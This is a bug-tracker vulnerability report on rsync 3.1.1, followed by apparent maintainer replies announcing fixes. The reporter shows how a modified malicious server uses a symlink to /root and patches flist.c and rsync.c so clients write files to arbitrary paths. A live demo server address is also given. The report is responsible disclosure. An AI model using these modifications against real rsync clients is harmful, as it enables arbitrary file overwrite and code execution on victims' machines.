Created attachment 10471 [details] Rsync path spoofing attack vulnerability (rsync 3.1.1 tested).pdf (Detailed documentation) Hi all In newest version rsync(3.1.1),directly modify the file path into absolute path is not hijack succeed due to the security checks,but using symbolic links still can bypass security checks and spoofing client.When a client uses parameter -a to synchronize files of the server-side(default),for example: rsync -avzP 127.0.0.1::share /tmp/share Rsync recursive synchronous all files,An attacker can hijack the file path by modifying the code of the server-side,allows remote servers to write to arbitrary files, and consequently execute arbitrary code . Vulnerability Details : Firstly,i write a following file into the shared folder in rsync:a true folder and a symbolic link are directed to the root directory . [root@pentest rsync]# ls -lh total 8.0K -rw-r--r-- 1 root root 2 Oct 31 03:16 1.txt lrwxrwxrwx 1 root root 6 Oct 31 05:09 fakedir -> /root/ drwxr-xr-x 2 root root 4.0K Oct 31 05:08 truedir Then enter the truedir folder, create a new file name "pwned". [root@pentest rsync]# cd truedir/ [root@pentest truedir]# ls [root@pentest truedir]# echo rsync test > pwned [root@pentest truedir]# ls -lh total 4.0K -rw-r--r-- 1 root root 11 Oct 31 05:17 pwned [root@pentest truedir]# Next I modify the server to send the file code,in the process of synchronizing,the path of file "pwned" can be blocked and changed into any path.For example as follow code,change true path (truedir) to symbolic link (fakedir),this would put the Pwned file to download to the symbolic link points to the address (fakedir -> /root/). file: flist.c line:394 static void send_file_entry(int f, const char *fname, struct file_struct *file, #ifdef SUPPORT_LINKS const char *symlink_name, int symlink_len, #endif int ndx, int first_ndx) { if(strcmp(fname,"turedir/pwned") == 0){ fname="fakedir/pwned"; // symbolic link //change file true path(truedir) to symbolic link (fakedir) ) } Then, verification occurs in the server-side and says "received request to transfer non-regular file fakedir/pwned.test 7 [sender]", But as an attacker, the code of the server-side can be arbitrarily controlled,Shielding the following code. file:rsync.c line:405 /* if (iflags & ITEM_TRANSFER) { int i = ndx - cur_flist->ndx_start; if (i < 0 || !S_ISREG(cur_flist->files[i]->mode)) { rprintf(FERROR, "received request to transfer non-regular file: %d [%s]\n", ndx, who_am_i()); exit_cleanup(RERR_PROTOCOL); } } */ Vulnerability Demo : Online test: rsync -avvzP 106.185.33.114::yaseng /tmp/yaseng
The latest git now has a fix for this exploit in an inc-recursive transfer (the default). See commit: 962f8b90045ab331fc04c9e65f80f1a53e68243b A transfer with --no-inc-recursive set (or an option that implies it) will sort the filenames wrong, so it would take some more malicous-sender helper code to deal with that, but it should be possible. I'll be looking at how best to deal with that code path next.
The code now also fixes the --no-inc-recursive code, which resolves all aspects of this issue. I will release 3.1.2 soon. Thanks for the report!